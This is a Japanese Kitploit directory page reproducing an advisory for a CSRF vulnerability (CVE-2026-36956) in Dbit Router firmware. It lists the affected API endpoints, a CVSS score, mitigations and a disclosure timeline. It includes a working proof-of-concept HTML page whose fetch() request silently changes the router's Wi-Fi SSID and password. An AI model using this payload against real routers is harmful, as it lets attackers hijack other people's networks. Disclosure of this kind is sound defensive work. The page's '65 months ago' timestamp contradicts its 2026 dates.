Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-36956 — CVE-2026-36956の概念実証。DbitルーターのファームウェアにおけるCSRF脆弱性で、偽造リクエストを介して不正な設定変更を可能にします。 | Kitploit
ツール/GitHubGitHub/kirubel-cve/cve-2026-36956
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubkirubel-cve/cve-2026-36956

CVE-2026-36956

CVE-2026-36956の概念実証。DbitルーターのファームウェアにおけるCSRF脆弱性で、偽造リクエストを介して不正な設定変更を可能にします。

リポジトリを見る
65ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-36956: Web管理インターフェースにおけるクロスサイトリクエストフォージェリ (CSRF)

CVE ID: CVE-2026-36956 日付: 2026-04-29 発見者: Kirubel Solomne ベンダー: Shenzhen Dibit Network Equipment Co., Ltd. 製品: Dbit Router ファームウェアバージョン: V1.0.0 CWE: CWE-352 - クロスサイトリクエストフォージェリ (CSRF)


説明

Dbit Router ファームウェア V1.0.0 は、管理APIエンドポイントにおいて、CSRFトークンや厳格なOrigin/Referer検証などのCSRF対策メカニズムを実装していません。攻撃者は、設定エンドポイントに対して偽造されたHTTPリクエストを送信する悪意のあるWebページを作成できます。認証済みの管理者がその悪意のあるページを訪問すると、ルーターは偽造されたリクエストを正当な管理操作として処理します。


CVSSスコア

CVSS v3.1 スコア: 8.8 (高) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

メトリック値
攻撃元ベクトルネットワーク
攻撃の複雑さ低
必要な特権なし
ユーザー操作必要
機密性への影響高
完全性への影響高
可用性への影響高

影響を受けるエンドポイント

エンドポイント機能
/api/setWlanワイヤレスネットワーク設定 (SSID、パスワード)
/api/setWanWAN設定
/api/setSystemシステム設定

概念実証

以下を poc.html として保存し、管理者がルーターにログインしている状態で開いてください:

<!DOCTYPE html>
<html>
<body>
<script>
  fetch('http://192.168.10.1/api/setWlan', {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      ssid: "Hacked_Network",
      password: "attacker123"
    })
  });
</script>
</body>
</html>

期待される動作: CSRFトークンの不一致によりリクエストは拒否されるべきです。 実際の動作: ルーターは偽造されたリクエストを受け入れ、処理します。


影響

  • WiFi SSIDおよびパスワードの不正な変更
  • WAN/DNS設定の変更
  • 正当なユーザーに対するサービス拒否
  • ルーター設定の完全な乗っ取り

対策

  • 状態を変更するすべてのエンドポイントにCSRFトークンを実装する
  • 厳格なOriginおよびRefererヘッダー検証を適用する
  • セッションCookieにSameSite=Strict属性を使用する

開示スケジュール

日付イベント
2026-04-29脆弱性を発見
2026-04-29MITREに報告
2026-04-29CVE-2026-36956 が割り当てられる
2026-04-29公開開示

参考情報

  • MITRE CVE-2026-36956
  • CWE-352
  • ベンダーウェブサイト
ツールをダウンロード